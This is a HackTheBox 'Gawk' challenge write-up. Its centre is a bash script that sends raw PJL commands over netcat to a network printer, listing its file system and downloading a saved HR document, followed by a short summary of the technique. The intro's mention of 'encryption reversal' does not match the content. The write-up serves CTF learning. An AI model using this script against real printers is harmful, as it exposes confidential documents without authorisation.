HackTheBox Gawk Writeup
Explore the basics of cybersecurity in the Gawk Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/bin/bash
if [ "$#" -ne 2 ]; then
echo "Usage: $0 <ip> <port>"
exit 1
fi
IP=$1
PORT=$2
OUTPUT_FILE="HR_Policies.pdf"
echo "[*] Connecting to printer at $IP:$PORT..."
echo "[*] Listing root directory..."
echo -e "@PJL FSDIRLIST NAME=\"0:/\" ENTRY=1 COUNT=65535\r\n" | nc -q 2 $IP $PORT
echo "[*] Listing saveDevice directory..."
echo -e "@PJL FSDIRLIST NAME=\"0:/saveDevice\" ENTRY=1 COUNT=65535\r\n" | nc -q 2 $IP $PORT
echo "[*] Listing SavedJobs directory..."
echo -e "@PJL FSDIRLIST NAME=\"0:/saveDevice/SavedJobs\" ENTRY=1 COUNT=65535\r\n" | nc -q 2 $IP $PORT
echo "[*] Listing InProgress directory..."
echo -e "@PJL FSDIRLIST NAME=\"0:/saveDevice/SavedJobs/InProgress\" ENTRY=1 COUNT=65535\r\n" | nc -q 2 $IP $PORT
echo "[*] Downloading HR_Policies.pdf..."
echo -e "@PJL FSUPLOAD NAME=\"0:/saveDevice/SavedJobs/InProgress/HR_Policies.pdf\" OFFSET=0 SIZE=41893\r\n" | nc -q 2 $IP $PORT | tail -n +2 | base64 -d > $OUTPUT_FILE
if [ -f "$OUTPUT_FILE" ]; then
echo "[+] File successfully downloaded as $OUTPUT_FILE"
echo "[+] Use a PDF viewer to open the file and retrieve the flag."
else
echo "[-] Failed to download the file."
fi
xdg-open HR_Policies.pdf
Summary
The Gawk Challenge on Hack The Box introduces the fundamentals of network printer exploitation through PJL (Printer Job Language) commands. By interacting with a vulnerable printer file system, you enumerate directories, identify target files, and leverage PJL commands like FSDIRLIST and FSUPLOAD to locate and download a sensitive document. This challenge is perfect for beginners, offering hands-on experience with network device abuse, file handling, and leveraging common printer protocols to retrieve hidden data efficiently.
This post is licensed under CC BY 4.0 by the author.